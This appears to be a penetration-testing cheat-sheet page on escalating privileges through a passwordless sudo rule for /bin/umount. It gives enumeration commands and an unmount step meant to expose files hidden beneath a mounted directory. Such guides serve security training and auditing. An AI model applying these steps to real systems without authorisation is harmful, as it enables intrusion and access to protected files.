search
Page cover

Sudo Umount Privilege Escalation

Sudo umount is vulnerable to privilege escalation.

hashtag
Investigationarrow-up-right

sudo -l

(root) NOPASSWD: /bin/umount
Copied!

If we can execute umount command as root, we can escalate to privilege.

hashtag
Exploitationarrow-up-right

In target machine, check what directory is mounted.

cat /etc/fstab
showmount -e localhost
Copied!

Assume the /opt/example folder is mounted. If we unmount this folder, original files, that existed before the directory is mounted, may appear.

sudo /bin/umount /opt/example
ls -al /opt/example
PreviousSudo Tee Privilege EscalationNextSudo Vim Privilege Escalation

Last updated